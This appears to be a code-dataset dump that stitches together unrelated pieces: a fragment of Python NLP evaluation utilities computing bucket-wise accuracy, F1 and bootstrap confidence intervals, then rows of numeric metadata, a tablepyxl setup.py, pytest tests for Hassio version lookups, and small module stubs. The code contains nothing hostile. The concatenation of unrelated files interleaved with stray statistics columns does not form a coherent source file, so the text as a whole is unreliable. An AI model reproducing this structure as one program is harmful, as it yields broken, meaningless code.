return sortDict(dict_bucket2f1)
def getBucketAcc_with_errorCase_re(dict_bucket2span, dict_bucket2span_pred, dict_sid2sent, is_print_ci, is_print_case):
# The structure of span_true or span_pred
# 2345|||Positive
# 2345 represents sentence id
# Positive represents the "label" of this instance
dict_bucket2f1 = {}
for bucket_interval, spans_true in dict_bucket2span.items():
spans_pred = []
if bucket_interval not in dict_bucket2span_pred.keys():
raise ValueError("Predict Label Bucketing Errors")
else:
spans_pred = dict_bucket2span_pred[bucket_interval]
# loop over samples from a given bucket
error_case_bucket_list = []
if is_print_case:
for info_true, info_pred in zip(spans_true, spans_pred):
sid_true, label_true = info_true.split("|||")
sid_pred, label_pred = info_pred.split("|||")
if sid_true != sid_pred:
continue
sent_entities = dict_sid2sent[sid_true]
if label_true != label_pred:
error_case_info = label_true + "|||" + label_pred + "|||" + sent_entities
error_case_bucket_list.append(error_case_info)
accuracy_each_bucket = accuracy(spans_pred, spans_true)
confidence_low, confidence_up = 0,0
if is_print_ci:
confidence_low, confidence_up = compute_confidence_interval_acc(spans_pred, spans_true)
dict_bucket2f1[bucket_interval] = [accuracy_each_bucket, len(spans_true), confidence_low, confidence_up, error_case_bucket_list]
return sortDict(dict_bucket2f1)
def getErrorCase_nli(sent1_list, sent2_list, true_label_list, pred_label_list):
errorCase_list = []
for sent1, sent2, true_label, pred_label in zip(sent1_list, sent2_list, true_label_list, pred_label_list):
if true_label != pred_label:
errorCase_list.append(true_label + "|||" + pred_label +"|||" + format4json_tc(sent1) +"|||" + format4json_tc(sent2))
return errorCase_list
def getBucketAcc_with_errorCase_nli(dict_bucket2span, dict_bucket2span_pred, dict_sid2sentpair, is_print_ci, is_print_case):
# The structure of span_true or span_pred
# 2345|||Positive
# 2345 represents sentence id
# Positive represents the "label" of this instance
dict_bucket2f1 = {}
for bucket_interval, spans_true in dict_bucket2span.items():
spans_pred = []
if bucket_interval not in dict_bucket2span_pred.keys():
raise ValueError("Predict Label Bucketing Errors")
else:
spans_pred = dict_bucket2span_pred[bucket_interval]
# loop over samples from a given bucket
error_case_bucket_list = []
if is_print_case:
for info_true, info_pred in zip(spans_true, spans_pred):
sid_true, label_true = info_true.split("|||")
sid_pred, label_pred = info_pred.split("|||")
if sid_true != sid_pred:
continue
sent = dict_sid2sentpair[sid_true]
if label_true != label_pred:
error_case_info = label_true + "|||" + label_pred + "|||" + sent
error_case_bucket_list.append(error_case_info)
accuracy_each_bucket = accuracy(spans_pred, spans_true)
confidence_low, confidence_up = 0,0
if is_print_ci:
confidence_low, confidence_up = compute_confidence_interval_acc(spans_pred, spans_true)
dict_bucket2f1[bucket_interval] = [accuracy_each_bucket, len(spans_true), confidence_low, confidence_up, error_case_bucket_list]
return sortDict(dict_bucket2f1)
def getErrorCase_absa(aspect_list, sent_list, true_label_list, pred_label_list):
errorCase_list = []
for aspect, sent, true_label, pred_label in zip(aspect_list, sent_list, true_label_list, pred_label_list):
if true_label != pred_label:
errorCase_list.append(true_label + "|||" + pred_label +"|||" + format4json_tc(aspect) +"|||" + format4json_tc(sent))
return errorCase_list
def getBucketAcc_with_errorCase_absa(dict_bucket2span, dict_bucket2span_pred, dict_sid2sentpair, is_print_ci, is_print_case):
# The structure of span_true or span_pred
# 2345|||Positive
# 2345 represents sentence id
# Positive represents the "label" of this instance
dict_bucket2f1 = {}
for bucket_interval, spans_true in dict_bucket2span.items():
spans_pred = []
# print('bucket_interval: ',bucket_interval)
if bucket_interval not in dict_bucket2span_pred.keys():
#print(bucket_interval)
raise ValueError("Predict Label Bucketing Errors")
else:
spans_pred = dict_bucket2span_pred[bucket_interval]
# loop over samples from a given bucket
error_case_bucket_list = []
if is_print_case:
for info_true, info_pred in zip(spans_true, spans_pred):
sid_true, label_true = info_true.split("|||")
sid_pred, label_pred = info_pred.split("|||")
if sid_true != sid_pred:
continue
sent = dict_sid2sentpair[sid_true]
if label_true != label_pred:
error_case_info = label_true + "|||" + label_pred + "|||" + sent
error_case_bucket_list.append(error_case_info)
accuracy_each_bucket = accuracy(spans_pred, spans_true)
confidence_low, confidence_up = 0,0
if is_print_ci:
confidence_low, confidence_up = compute_confidence_interval_acc(spans_pred, spans_true)
dict_bucket2f1[bucket_interval] = [accuracy_each_bucket, len(spans_true), confidence_low, confidence_up, error_case_bucket_list]
# print(error_case_bucket_list)
print("accuracy_each_bucket:\t", accuracy_each_bucket)
return sortDict(dict_bucket2f1)
# 1000
def compute_confidence_interval_f1_cws(spans_true, spans_pred, dict_span2sid, dict_span2sid_pred, n_times=1000):
n_data = len(dict_span2sid)
sample_rate = get_sample_rate(n_data)
n_sampling = int(n_data * sample_rate)
print("sample_rate:\t", sample_rate)
print("n_sampling:\t", n_sampling)
dict_sid2span_salient = {}
for span in spans_true:
#print(span)
if len(span.split("|||"))!=3:
break
sid = dict_span2sid[span]
if sid in dict_sid2span_salient.keys():
dict_sid2span_salient[sid].append(span)
else:
dict_sid2span_salient[sid] = [span]
dict_sid2span_salient_pred = {}
for span in spans_pred:
sid = dict_span2sid_pred[span]
if sid in dict_sid2span_salient_pred.keys():
dict_sid2span_salient_pred[sid].append(span)
else:
dict_sid2span_salient_pred[sid] = [span]
performance_list = []
confidence_low, confidence_up = 0,0
for i in range(n_times):
sample_index_list = choices(range(n_data), k=n_sampling)
true_label_bootstrap_list = []
pred_label_bootstrap_list = []
for ind, sid in enumerate(sample_index_list):
if sid in dict_sid2span_salient.keys():
true_label_list = dict_sid2span_salient[sid]
true_label_list_revised = [true_label + "|||" + str(ind) for true_label in true_label_list]
true_label_bootstrap_list += true_label_list_revised
if sid in dict_sid2span_salient_pred.keys():
pred_label_list = dict_sid2span_salient_pred[sid]
pred_label_list_revised = [pred_label + "|||" + str(ind) for pred_label in pred_label_list]
pred_label_bootstrap_list += pred_label_list_revised
f1, p, r = evaluate_chunk_level(pred_label_bootstrap_list, true_label_bootstrap_list)
performance_list.append(f1)
if n_times != 1000:
confidence_low, confidence_up = mean_confidence_interval(performance_list)
else:
performance_list.sort()
confidence_low = performance_list[24]
confidence_up = performance_list[974]
# print("\n")
# print("confidence_low:\t", confidence_low)
# print("confidence_up:\t", confidence_up)
return confidence_low, confidence_up
# dict_chunkid2spanSent: 2_3 -> New York|||This is New York city
# dict_pos2tag: 2_3 -> NER
def get_errorCase_cws(dict_pos2tag, dict_pos2tag_pred, dict_chunkid2spanSent, dict_chunkid2spanSent_pred, list_true_tags_token, list_pred_tags_token):
errorCase_list = []
for pos, tag in dict_pos2tag.items():
true_label = tag
pred_label = ""
#print(dict_chunkid2spanSent.keys())
if pos+"|||"+tag not in dict_chunkid2spanSent.keys():
continue
span_sentence = dict_chunkid2spanSent[pos+"|||"+tag]
if pos in dict_pos2tag_pred.keys():
pred_label = dict_pos2tag_pred[pos]
if true_label == pred_label:
continue
# print(pos + "\t" + true_label + "\t" + pred_label)
else:
start = int(pos.split("|||")[0])
end = int(pos.split("|||")[1])
pred_label = "".join(list_pred_tags_token[start:end])
# print(pred_label)
error_case = span_sentence + "|||" + true_label + "|||" + pred_label
errorCase_list.append(error_case)
for pos, tag in dict_pos2tag_pred.items():
true_label = ""
pred_label = tag
if pos+"|||"+tag not in dict_chunkid2spanSent_pred.keys():
continue
span_sentence = dict_chunkid2spanSent_pred[pos+"|||"+tag]
if pos in dict_pos2tag.keys():
true_label = dict_pos2tag[pos]
if true_label == pred_label:
continue
else:
start = int(pos.split("|||")[0])
end = int(pos.split("|||")[1])
true_label = "".join(list_true_tags_token[start:end])
error_case = span_sentence + "|||" + true_label + "|||" + pred_label
errorCase_list.append(error_case)
# for v in errorCase_list:
# print(len(errorCase_list))
# print(v)
#print(errorCase_list)
return errorCase_list
################ Calculate Bucket-wise F1 Score:
def getBucketF1_cws(dict_bucket2span, dict_bucket2span_pred, dict_span2sid, dict_span2sid_pred, dict_chunkid2span, dict_chunkid2span_pred, list_true_tags_token, list_pred_tags_token, is_print_ci, is_print_case):
dict_bucket2f1 = {}
# predict: 2_3 -> NER
dict_pos2tag_pred = {}
if is_print_case:
for k_bucket_eval, spans_pred in dict_bucket2span_pred.items():
for span_pred in spans_pred:
pos_pred = "|||".join(span_pred.split("|||")[0:2])
tag_pred = span_pred.split("|||")[-1]
dict_pos2tag_pred[pos_pred] = tag_pred
# true: 2_3 -> NER
dict_pos2tag = {}
if is_print_case:
for k_bucket_eval, spans in dict_bucket2span.items():
for span in spans:
pos = "|||".join(span.split("|||")[0:2])
tag = span.split("|||")[-1]
dict_pos2tag[pos] = tag
errorCase_list = []
if is_print_case:
errorCase_list = get_errorCase_cws(dict_pos2tag, dict_pos2tag_pred, dict_chunkid2span, dict_chunkid2span_pred, list_true_tags_token, list_pred_tags_token)
# print(len(errorCase_list))
# print(errorCase_list)
for bucket_interval, spans_true in dict_bucket2span.items():
spans_pred = []
if bucket_interval not in dict_bucket2span_pred.keys():
raise ValueError("Predict Label Bucketing Errors")
else:
spans_pred = dict_bucket2span_pred[bucket_interval]
confidence_low, confidence_up = 0,0
if is_print_ci:
confidence_low, confidence_up = compute_confidence_interval_f1_cws(spans_true, spans_pred, dict_span2sid, dict_span2sid_pred)
confidence_low = format(confidence_low , '.3g')
confidence_up = format(confidence_up, '.3g')
f1, p, r = evaluate_chunk_level(spans_pred, spans_true)
error_entity_list = []
if is_print_case:
for span_true in spans_true:
if span_true not in spans_pred:
#print(span_true)
pos_true = "|||".join(span_true.split("|||")[0:2])
tag_true = span_true.split("|||")[-1]
if pos_true in dict_pos2tag_pred.keys():
tag_pred = dict_pos2tag_pred[pos_true]
if tag_pred != tag_true:
error_entity_list.append(dict_chunkid2span[span_true] + "|||" + tag_true + "|||" + dict_pos2tag_pred[pos_true])
#print(dict_chunkid2span[span_true] + "|||" + tag_true + "|||" + dict_pos2tag_pred[pos_true])
else:
start = int(pos_true.split("|||")[0])
end = int(pos_true.split("|||")[1])
pred_label = "".join(list_pred_tags_token[start:end])
error_entity_list.append(dict_chunkid2span[span_true] + "|||" + tag_true + "|||" + pred_label)
#print(dict_chunkid2span[span_true] + "|||" + tag_true + "|||" + pred_label)
dict_bucket2f1[bucket_interval] = [f1, len(spans_true), confidence_low, confidence_up, error_entity_list]
# if bucket_interval[0] == 1.0:
# print("debug-f1:",f1)
# print(spans_pred[0:20])
# print(spans_true[0:20])
# print("dict_bucket2f1: ",dict_bucket2f1)
return sortDict(dict_bucket2f1), errorCase_list
# dict_chunkid2spanSent: 2_3 -> New York|||This is New York city
# dict_pos2tag: 2_3 -> NER
def get_errorCase_pos(dict_pos2tag, dict_pos2tag_pred, dict_chunkid2spanSent, dict_chunkid2spanSent_pred):
# print("debug-1:")
# print()
errorCase_list = []
for pos, tag in dict_pos2tag.items():
true_label = tag
pred_label = ""
#print(dict_chunkid2spanSent.keys())
if pos+"_"+tag not in dict_chunkid2spanSent.keys():
continue
span_sentence = dict_chunkid2spanSent[pos+"_"+tag]
if pos in dict_pos2tag_pred.keys():
pred_label = dict_pos2tag_pred[pos]
if true_label == pred_label:
continue
else:
#pred_label = "O"
continue
error_case = format4json_tc(span_sentence) + "|||" + true_label + "|||" + pred_label
# if pred_label == "O":
# print(error_case)
# print(len(dict_pos2tag), len(dict_pos2tag_pred))
# print(pos)
errorCase_list.append(error_case)
#print(errorCase_list)
return errorCase_list
# 1000
def compute_confidence_interval_f1_pos(spans_true, spans_pred, dict_span2sid, dict_span2sid_pred, n_times=100):
n_data = len(dict_span2sid)
sample_rate = get_sample_rate(n_data)
n_sampling = int(n_data * sample_rate)
print("sample_rate:\t", sample_rate)
print("n_sampling:\t", n_sampling)
dict_sid2span_salient = {}
for span in spans_true:
#print(span)
if len(span.split("_"))!=3:
break
sid = dict_span2sid[span]
if sid in dict_sid2span_salient.keys():
dict_sid2span_salient[sid].append(span)
else:
dict_sid2span_salient[sid] = [span]
dict_sid2span_salient_pred = {}
for span in spans_pred:
sid = dict_span2sid_pred[span]
if sid in dict_sid2span_salient_pred.keys():
dict_sid2span_salient_pred[sid].append(span)
else:
dict_sid2span_salient_pred[sid] = [span]
performance_list = []
confidence_low, confidence_up = 0,0
for i in range(n_times):
sample_index_list = choices(range(n_data), k=n_sampling)
true_label_bootstrap_list = []
pred_label_bootstrap_list = []
for ind, sid in enumerate(sample_index_list):
if sid in dict_sid2span_salient.keys():
true_label_list = dict_sid2span_salient[sid]
true_label_list_revised = [true_label + "_" + str(ind) for true_label in true_label_list]
true_label_bootstrap_list += true_label_list_revised
if sid in dict_sid2span_salient_pred.keys():
pred_label_list = dict_sid2span_salient_pred[sid]
pred_label_list_revised = [pred_label + "_" + str(ind) for pred_label in pred_label_list]
pred_label_bootstrap_list += pred_label_list_revised
f1, p, r = evaluate_chunk_level(pred_label_bootstrap_list, true_label_bootstrap_list)
performance_list.append(f1)
if n_times != 1000:
confidence_low, confidence_up = mean_confidence_interval(performance_list)
else:
performance_list.sort()
confidence_low = performance_list[24]
confidence_up = performance_list[974]
# print("\n")
# print("confidence_low:\t", confidence_low)
# print("confidence_up:\t", confidence_up)
return confidence_low, confidence_up
def getBucketF1_pos(dict_bucket2span, dict_bucket2span_pred, dict_span2sid, dict_span2sid_pred, dict_chunkid2span, dict_chunkid2span_pred, is_print_ci, is_print_case):
errorCase_list = []
dict_bucket2f1 = {}
# predict: 2_3 -> NER
dict_pos2tag_pred = {}
if is_print_case:
for k_bucket_eval, spans_pred in dict_bucket2span_pred.items():
for span_pred in spans_pred:
pos_pred = "_".join(span_pred.split("_")[0:2])
tag_pred = span_pred.split("_")[-1]
dict_pos2tag_pred[pos_pred] = tag_pred
#print(dict_pos2tag_pred)
# true: 2_3 -> NER
dict_pos2tag = {}
if is_print_case:
for k_bucket_eval, spans in dict_bucket2span.items():
for span in spans:
pos = "_".join(span.split("_")[0:2])
tag = span.split("_")[-1]
dict_pos2tag[pos] = tag
# print(dict_pos2tag_pred)
if is_print_case:
errorCase_list = get_errorCase_pos(dict_pos2tag, dict_pos2tag_pred, dict_chunkid2span, dict_chunkid2span_pred)
for bucket_interval, spans_true in dict_bucket2span.items():
spans_pred = []
#print('bucket_interval: ',bucket_interval)
if bucket_interval not in dict_bucket2span_pred.keys():
#print(bucket_interval)
raise ValueError("Predict Label Bucketing Errors")
else:
spans_pred = dict_bucket2span_pred[bucket_interval]
confidence_low, confidence_up = 0,0
if is_print_ci:
confidence_low, confidence_up = compute_confidence_interval_f1_pos(spans_true, spans_pred, dict_span2sid, dict_span2sid_pred)
confidence_low = format(confidence_low , '.3g')
confidence_up = format(confidence_up, '.3g')
f1, p, r = evaluate_chunk_level(spans_pred, spans_true)
error_entity_list = []
if is_print_case:
for span_true in spans_true:
if span_true not in spans_pred:
#print(span_true)
pos_true = "_".join(span_true.split("_")[0:2])
tag_true = span_true.split("_")[-1]
if pos_true in dict_pos2tag_pred.keys():
tag_pred = dict_pos2tag_pred[pos_true]
if tag_pred != tag_true:
error_entity_list.append(format4json_tc(dict_chunkid2span[span_true]) + "|||" + tag_true + "|||" + dict_pos2tag_pred[pos_true])
else:
#error_entity_list.append(format4json_tc(dict_chunkid2span[span_true]) + "|||" + tag_true + "|||" + "O")
continue
# print("confidence_low:\t", confidence_low)
# print("confidence_up:\t", confidence_up)
# print("F1:\t", f1)
#print(error_entity_list)
dict_bucket2f1[bucket_interval] = [f1, len(spans_true), confidence_low, confidence_up, error_entity_list]
# if bucket_interval[0] == 1.0:
# print("debug-f1:",f1)
# print(spans_pred[0:20])
# print(spans_true[0:20])
# print("dict_bucket2f1: ",dict_bucket2f1)
return sortDict(dict_bucket2f1), errorCase_list
def getBucketF1_chunk(dict_bucket2span, dict_bucket2span_pred, dict_span2sid, dict_span2sid_pred, dict_chunkid2span, dict_chunkid2span_pred, is_print_ci, is_print_case):
dict_bucket2f1 = {}
# predict: 2_3 -> NER
dict_pos2tag_pred = {}
if is_print_case:
for k_bucket_eval, spans_pred in dict_bucket2span_pred.items():
for span_pred in spans_pred:
pos_pred = "_".join(span_pred.split("_")[0:2])
tag_pred = span_pred.split("_")[-1]
dict_pos2tag_pred[pos_pred] = tag_pred
# true: 2_3 -> NER
dict_pos2tag = {}
if is_print_case:
for k_bucket_eval, spans in dict_bucket2span.items():
for span in spans:
pos = "_".join(span.split("_")[0:2])
tag = span.split("_")[-1]
dict_pos2tag[pos] = tag
errorCase_list = []
if is_print_case:
errorCase_list = get_errorCase(dict_pos2tag, dict_pos2tag_pred, dict_chunkid2span, dict_chunkid2span_pred)
for bucket_interval, spans_true in dict_bucket2span.items():
spans_pred = []
#print('bucket_interval: ',bucket_interval)
if bucket_interval not in dict_bucket2span_pred.keys():
#print(bucket_interval)
raise ValueError("Predict Label Bucketing Errors")
else:
spans_pred = dict_bucket2span_pred[bucket_interval]
confidence_low, confidence_up = 0,0
if is_print_ci:
confidence_low, confidence_up = compute_confidence_interval_f1(spans_true, spans_pred, dict_span2sid, dict_span2sid_pred)
confidence_low = format(confidence_low , '.3g')
confidence_up = format(confidence_up, '.3g')
f1, p, r = evaluate_chunk_level(spans_pred, spans_true)
error_entity_list = []
if is_print_case:
for span_true in spans_true:
if span_true not in spans_pred:
#print(span_true)
pos_true = "_".join(span_true.split("_")[0:2])
tag_true = span_true.split("_")[-1]
if pos_true in dict_pos2tag_pred.keys():
tag_pred = dict_pos2tag_pred[pos_true]
if tag_pred != tag_true:
error_entity_list.append(dict_chunkid2span[span_true] + "|||" + tag_true + "|||" + dict_pos2tag_pred[pos_true])
else:
error_entity_list.append(dict_chunkid2span[span_true] + "|||" + tag_true + "|||" + "O")
# print("confidence_low:\t", confidence_low)
# print("confidence_up:\t", confidence_up)
# print("F1:\t", f1)
#print(error_entity_list)
dict_bucket2f1[bucket_interval] = [f1, len(spans_true), confidence_low, confidence_up, error_entity_list]
# if bucket_interval[0] == 1.0:
# print("debug-f1:",f1)
# print(spans_pred[0:20])
# print(spans_true[0:20])
# print("dict_bucket2f1: ",dict_bucket2f1)
return sortDict(dict_bucket2f1), errorCase_list
def getErrorCase_semp(text_list, sql_true_list, sql_pred_list, is_match_list):
errorCase_list = []
for text, sql_true, sql_pred, is_match in zip(text_list, sql_true_list, sql_pred_list, is_match_list):
if is_match == "0":
errorCase_list.append(format4json_tc(text) + "|||" + format4json_tc(sql_true) + "|||" + format4json_tc(sql_pred) )
return errorCase_list
def getBucketAcc_with_errorCase_semp(dict_bucket2span, dict_bucket2span_pred, dict_sid2sentpair):
# The structure of span_true or span_pred
# 2345|||Positive
# 2345 represents sentence id
# Positive represents the "label" of this instance
dict_bucket2f1 = {}
for bucket_interval, spans_true in dict_bucket2span.items():
spans_pred = []
# print('bucket_interval: ',bucket_interval)
if bucket_interval not in dict_bucket2span_pred.keys():
#print(bucket_interval)
raise ValueError("Predict Label Bucketing Errors")
else:
spans_pred = dict_bucket2span_pred[bucket_interval]
# loop over samples from a given bucket
error_case_bucket_list = []
for info_true, info_pred in zip(spans_true, spans_pred):
sid_true, label_true = info_true.split("|||")
sid_pred, label_pred = info_pred.split("|||")
if sid_true != sid_pred:
continue
sent = dict_sid2sentpair[sid_true]
if label_true != label_pred:
error_case_info = sent
error_case_bucket_list.append(error_case_info)
accuracy_each_bucket = accuracy(spans_pred, spans_true)
# print("debug: span_pred:\t")
# print(spans_pred)
confidence_low, confidence_up = compute_confidence_interval_acc(spans_pred, spans_true)
dict_bucket2f1[bucket_interval] = [accuracy_each_bucket, len(spans_true), confidence_low, confidence_up, error_case_bucket_list]
# print(error_case_bucket_list)
print("accuracy_each_bucket:\t", accuracy_each_bucket)
return sortDict(dict_bucket2f1)
| 27.631151
| 211
| 0.685751
| 8,742
| 61,203
| 4.479067
| 0.051247
| 0.024134
| 0.024671
| 0.026816
| 0.781719
| 0.749796
| 0.727143
| 0.712254
| 0.700352
| 0.694504
| 0
| 0.025964
| 0.177524
| 61,203
| 2,214
| 212
| 27.643631
| 0.751897
| 0.146055
| 0
| 0.666932
| 0
| 0.011924
| 0.034821
| 0.003201
| 0
| 0
| 0
| 0
| 0
| 1
| 0.062003
| false
| 0.000795
| 0.014308
| 0.00159
| 0.139905
| 0.054054
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
7439db78b8174742ff52526ef4f1e69a3e8a0f83
| 869
|
py
|
Python
|
setup.py
|
WenmuZhou/tablepyxl
|
3cb2a9e12b543bf46777b55bf64857281669fe98
|
[
"MIT"
] | 22
|
2017-01-06T17:27:53.000Z
|
2022-03-07T10:35:38.000Z
|
setup.py
|
WenmuZhou/tablepyxl
|
3cb2a9e12b543bf46777b55bf64857281669fe98
|
[
"MIT"
] | 14
|
2016-12-19T22:53:29.000Z
|
2021-12-13T19:44:11.000Z
|
setup.py
|
Wandrys-dev/tablepyxl
|
54bb89db70b184777074ea2badfb032ee10e6ab2
|
[
"MIT"
] | 17
|
2015-07-20T22:06:13.000Z
|
2021-06-15T13:41:01.000Z
|
from setuptools import setup, find_packages
setup(
name='tablepyxl',
version='0.6.1',
description='Generate Excel documents from html tables',
url='https://github.com/martsberger/tablepyxl',
download_url='https://github.com/martsberger/tablepyxl/archive/0.6.1.tar.gz',
author='Brad Martsberger, Asma Mehjabeen, Brian Davis',
author_email='bmarts@lumere.com',
license='MIT',
classifiers=[
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7'
],
packages=find_packages(),
install_requires=['openpyxl', 'premailer', 'requests', 'lxml']
)
| 36.208333
| 81
| 0.639816
| 96
| 869
| 5.739583
| 0.552083
| 0.241379
| 0.317604
| 0.235935
| 0.134301
| 0.134301
| 0
| 0
| 0
| 0
| 0
| 0.026087
| 0.205984
| 869
| 23
| 82
| 37.782609
| 0.772464
| 0
| 0
| 0
| 1
| 0.045455
| 0.581128
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.045455
| 0
| 0.045455
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
7473252fb908a4341aee99ec7efd551dcb795f88
| 2,770
|
py
|
Python
|
tests/test_hassio.py
|
makefu/pyhaversion
|
adf4f237e47d7b3f62a52e6cf084824b20e9c1bb
|
[
"MIT"
] | null | null | null |
tests/test_hassio.py
|
makefu/pyhaversion
|
adf4f237e47d7b3f62a52e6cf084824b20e9c1bb
|
[
"MIT"
] | null | null | null |
tests/test_hassio.py
|
makefu/pyhaversion
|
adf4f237e47d7b3f62a52e6cf084824b20e9c1bb
|
[
"MIT"
] | null | null | null |
"""Tests for Hassio."""
import json
import aiohttp
import pytest
from pyhaversion import HassioVersion
from .const import (
HEADERS,
STABLE_VERSION,
STABLE_VERSION_BETA_WEEK,
BETA_VERSION,
BETA_VERSION_BETA_WEEK,
)
from .fixtures.fixture_hassio import (
hassio_response,
hassio_response_beta_week,
hassio_beta_response,
hassio_beta_response_beta_week,
)
@pytest.mark.asyncio
async def test_stable_version(aresponses, event_loop, hassio_response):
"""Test hassio stable."""
aresponses.add(
"s3.amazonaws.com",
"/hassio-version/stable.json",
"get",
aresponses.Response(
text=json.dumps(hassio_response), status=200, headers=HEADERS
),
)
async with aiohttp.ClientSession(loop=event_loop) as session:
haversion = HassioVersion(event_loop, session)
await haversion.get_version()
assert haversion.version == STABLE_VERSION
@pytest.mark.asyncio
async def test_beta_version(aresponses, event_loop, hassio_beta_response):
"""Test hassio beta."""
aresponses.add(
"s3.amazonaws.com",
"/hassio-version/beta.json",
"get",
aresponses.Response(
text=json.dumps(hassio_beta_response), status=200, headers=HEADERS
),
)
async with aiohttp.ClientSession(loop=event_loop) as session:
haversion = HassioVersion(event_loop, session, "beta")
await haversion.get_version()
assert haversion.version == BETA_VERSION
@pytest.mark.asyncio
async def test_stable_version_beta_week(
aresponses, event_loop, hassio_response_beta_week
):
"""Test hassio stable during beta week."""
aresponses.add(
"s3.amazonaws.com",
"/hassio-version/stable.json",
"get",
aresponses.Response(
text=json.dumps(hassio_response_beta_week), status=200, headers=HEADERS
),
)
async with aiohttp.ClientSession(loop=event_loop) as session:
haversion = HassioVersion(event_loop, session)
await haversion.get_version()
assert haversion.version == STABLE_VERSION_BETA_WEEK
@pytest.mark.asyncio
async def test_beta_version_beta_week(
aresponses, event_loop, hassio_beta_response_beta_week
):
"""Test hassio beta during beta week."""
aresponses.add(
"s3.amazonaws.com",
"/hassio-version/beta.json",
"get",
aresponses.Response(
text=json.dumps(hassio_beta_response_beta_week), status=200, headers=HEADERS
),
)
async with aiohttp.ClientSession(loop=event_loop) as session:
haversion = HassioVersion(event_loop, session, "beta")
await haversion.get_version()
assert haversion.version == BETA_VERSION_BETA_WEEK
| 28.556701
| 88
| 0.684116
| 316
| 2,770
| 5.759494
| 0.139241
| 0.061538
| 0.049451
| 0.048352
| 0.868132
| 0.781868
| 0.754945
| 0.718681
| 0.61978
| 0.61978
| 0
| 0.007394
| 0.218773
| 2,770
| 96
| 89
| 28.854167
| 0.833641
| 0.006137
| 0
| 0.545455
| 0
| 0
| 0.071838
| 0.03974
| 0
| 0
| 0
| 0
| 0.051948
| 1
| 0
| false
| 0
| 0.077922
| 0
| 0.077922
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
777158732d632ac14ea57da1212a1bc1484ac41e
| 38
|
py
|
Python
|
factual/common/exceptions.py
|
casebeer/factual
|
f2795a8c9fd447c5d62887ae0f960481ce13be84
|
[
"BSD-2-Clause"
] | 4
|
2015-01-02T01:16:52.000Z
|
2016-04-05T03:29:32.000Z
|
factual/common/exceptions.py
|
casebeer/factual
|
f2795a8c9fd447c5d62887ae0f960481ce13be84
|
[
"BSD-2-Clause"
] | null | null | null |
factual/common/exceptions.py
|
casebeer/factual
|
f2795a8c9fd447c5d62887ae0f960481ce13be84
|
[
"BSD-2-Clause"
] | null | null | null |
class FactualError(Exception):
pass
| 9.5
| 30
| 0.789474
| 4
| 38
| 7.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.131579
| 38
| 3
| 31
| 12.666667
| 0.909091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.5
| 0
| 0
| 0.5
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 5
|
77938b3d81e6c77f7da1d074b11b49ed1c89eabe
| 107
|
py
|
Python
|
largescale/src/neuron/connection/connection/__init__.py
|
cosmozhang-lab/motion-illusion-model
|
32a5ccab920095818b220642bae491429ff71f27
|
[
"MIT"
] | null | null | null |
largescale/src/neuron/connection/connection/__init__.py
|
cosmozhang-lab/motion-illusion-model
|
32a5ccab920095818b220642bae491429ff71f27
|
[
"MIT"
] | null | null | null |
largescale/src/neuron/connection/connection/__init__.py
|
cosmozhang-lab/motion-illusion-model
|
32a5ccab920095818b220642bae491429ff71f27
|
[
"MIT"
] | null | null | null |
# Package: largescale.src.neuron.connection.connection
from connection import ConnectivityPool, Connection
| 35.666667
| 54
| 0.859813
| 11
| 107
| 8.363636
| 0.727273
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.074766
| 107
| 3
| 55
| 35.666667
| 0.929293
| 0.485981
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
77a918e079209fd67d3dc91b6148c893d38b03a8
| 33
|
py
|
Python
|
views/__init__.py
|
reganto/tornado
|
ea71bc9d91483d564f9a0faa3d5adf614b023603
|
[
"Apache-2.0"
] | 7
|
2018-07-12T19:51:57.000Z
|
2019-10-14T07:11:44.000Z
|
views/__init__.py
|
reganto/tornado
|
ea71bc9d91483d564f9a0faa3d5adf614b023603
|
[
"Apache-2.0"
] | 1
|
2019-08-02T14:16:40.000Z
|
2019-08-03T14:31:17.000Z
|
views/__init__.py
|
reganto/tornado
|
ea71bc9d91483d564f9a0faa3d5adf614b023603
|
[
"Apache-2.0"
] | null | null | null |
from .home import HomePageHandler
| 33
| 33
| 0.878788
| 4
| 33
| 7.25
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.090909
| 33
| 1
| 33
| 33
| 0.966667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
